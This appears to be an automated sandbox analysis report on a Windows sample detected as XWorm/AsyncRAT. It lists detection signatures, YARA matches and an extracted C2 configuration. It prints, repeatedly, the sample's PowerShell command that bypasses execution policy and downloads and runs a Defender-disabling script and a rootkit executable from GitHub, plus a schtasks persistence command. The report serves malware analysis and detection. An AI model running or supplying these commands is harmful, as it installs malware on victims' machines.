Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
svchost.exe.bin.exe

Overview

General Information

Sample name:svchost.exe.bin.exe
Analysis ID:1634105
MD5:2b42433cc8d3450d015d04a3c8662558
SHA1:0932042702ed80152a37c564aeb2114dc48dd3af
SHA256:075151678431e9ed1a6f26563f7a2143517bec7741c6dc53a106fbad4fe2d41a
Tags:exeuser-TornadoAV_dev
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Sigma detected: Schedule system process
Yara detected Powershell download and execute
Yara detected XWorm
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Joe Sandbox ML detected suspicious sample
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • svchost.exe.bin.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\svchost.exe.bin.exe" MD5: 2B42433CC8D3450D015D04A3C8662558)
    • powershell.exe (PID: 2876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 4628 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe.bin.exe (PID: 7352 cmdline: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe MD5: 2B42433CC8D3450D015D04A3C8662558)
  • cleanup
{"C2 url": ["group-coupon.gl.at.ply.gg"], "Port": 24196, "Aes key": "<123456789>", "SPL": "<Neptune>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
svchost.exe.bin.exeJoeSecurity_XWormYara detected XWormJoe Security
    svchost.exe.bin.exerat_win_xworm_v2Finds XWorm v2 samples based on characteristic stringsSekoia.io
    • 0xc405:$str02: ngrok
    • 0xc445:$str02: ngrok
    • 0xc50f:$str04: FileManagerSplitFileManagerSplit
    • 0xc423:$str05: InstallngC
    • 0xc13f:$str06: downloadedfile
    • 0xc111:$str07: creatfile
    • 0xc0f3:$str08: creatnewfolder
    • 0xc0d5:$str09: showfolderfile
    • 0xc0b7:$str10: hidefolderfile
    • 0xc089:$str11: txtttt
    • 0xcad4:$str12: \root\SecurityCenter2
    • 0xc595:$str13: [USB]
    • 0xc57b:$str14: [Drive]
    • 0xc4fd:$str15: [Folder]
    • 0xc3f3:$str16: HVNC
    • 0xcb00:$str19: Select * from AntivirusProduct
    • 0xbe4f:$str20: runnnnnn
    • 0xbd11:$str21: RunBotKiller
    svchost.exe.bin.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xb887:$s6: VirtualBox
    • 0xb7e5:$s8: Win32_ComputerSystem
    • 0xc76c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xc809:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xc91e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xcb64:$cnc4: POST / HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\svchost.exe.bin.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\svchost.exe.bin.exerat_win_xworm_v2Finds XWorm v2 samples based on characteristic stringsSekoia.io
      • 0xc405:$str02: ngrok
      • 0xc445:$str02: ngrok
      • 0xc50f:$str04: FileManagerSplitFileManagerSplit
      • 0xc423:$str05: InstallngC
      • 0xc13f:$str06: downloadedfile
      • 0xc111:$str07: creatfile
      • 0xc0f3:$str08: creatnewfolder
      • 0xc0d5:$str09: showfolderfile
      • 0xc0b7:$str10: hidefolderfile
      • 0xc089:$str11: txtttt
      • 0xcad4:$str12: \root\SecurityCenter2
      • 0xc595:$str13: [USB]
      • 0xc57b:$str14: [Drive]
      • 0xc4fd:$str15: [Folder]
      • 0xc3f3:$str16: HVNC
      • 0xcb00:$str19: Select * from AntivirusProduct
      • 0xbe4f:$str20: runnnnnn
      • 0xbd11:$str21: RunBotKiller
      C:\Users\user\AppData\Roaming\svchost.exe.bin.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xb887:$s6: VirtualBox
      • 0xb7e5:$s8: Win32_ComputerSystem
      • 0xc76c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xc809:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xc91e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xcb64:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1172627223.0000000000AA2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1172627223.0000000000AA2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xb687:$s6: VirtualBox
        • 0xb5e5:$s8: Win32_ComputerSystem
        • 0xc56c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xc609:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xc71e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xc964:$cnc4: POST / HTTP/1.1
        Process Memory Space: svchost.exe.bin.exe PID: 6992JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: svchost.exe.bin.exe PID: 6992JoeSecurity_XWormYara detected XWormJoe Security
            Process Memory Space: svchost.exe.bin.exe PID: 6992MALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x17068:$s6: VirtualBox
            • 0x28bfc:$s6: VirtualBox
            • 0x32ad:$s8: Win32_ComputerSystem
            • 0x4b6f:$s8: Win32_ComputerSystem
            • 0x7240:$s8: Win32_ComputerSystem
            • 0x72b1:$s8: Win32_ComputerSystem
            • 0x1701b:$s8: Win32_ComputerSystem
            • 0x1e0c8:$s8: Win32_ComputerSystem
            • 0x1e194:$s8: Win32_ComputerSystem
            • 0x238a3:$s8: Win32_ComputerSystem
            • 0x2396f:$s8: Win32_ComputerSystem
            • 0x28bae:$s8: Win32_ComputerSystem
            • 0x176fd:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x1774b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x177d5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x178f6:$cnc4: POST / HTTP/1.1
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            0.0.svchost.exe.bin.exe.aa0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.0.svchost.exe.bin.exe.aa0000.0.unpackrat_win_xworm_v2Finds XWorm v2 samples based on characteristic stringsSekoia.io
              • 0xc405:$str02: ngrok
              • 0xc445:$str02: ngrok
              • 0xc50f:$str04: FileManagerSplitFileManagerSplit
              • 0xc423:$str05: InstallngC
              • 0xc13f:$str06: downloadedfile
              • 0xc111:$str07: creatfile
              • 0xc0f3:$str08: creatnewfolder
              • 0xc0d5:$str09: showfolderfile
              • 0xc0b7:$str10: hidefolderfile
              • 0xc089:$str11: txtttt
              • 0xcad4:$str12: \root\SecurityCenter2
              • 0xc595:$str13: [USB]
              • 0xc57b:$str14: [Drive]
              • 0xc4fd:$str15: [Folder]
              • 0xc3f3:$str16: HVNC
              • 0xcb00:$str19: Select * from AntivirusProduct
              • 0xbe4f:$str20: runnnnnn
              • 0xbd11:$str21: RunBotKiller
              0.0.svchost.exe.bin.exe.aa0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xb887:$s6: VirtualBox
              • 0xb7e5:$s8: Win32_ComputerSystem
              • 0xc76c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xc809:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xc91e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xcb64:$cnc4: POST / HTTP/1.1
              SourceRuleDescriptionAuthorStrings
              amsi64_2876.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { 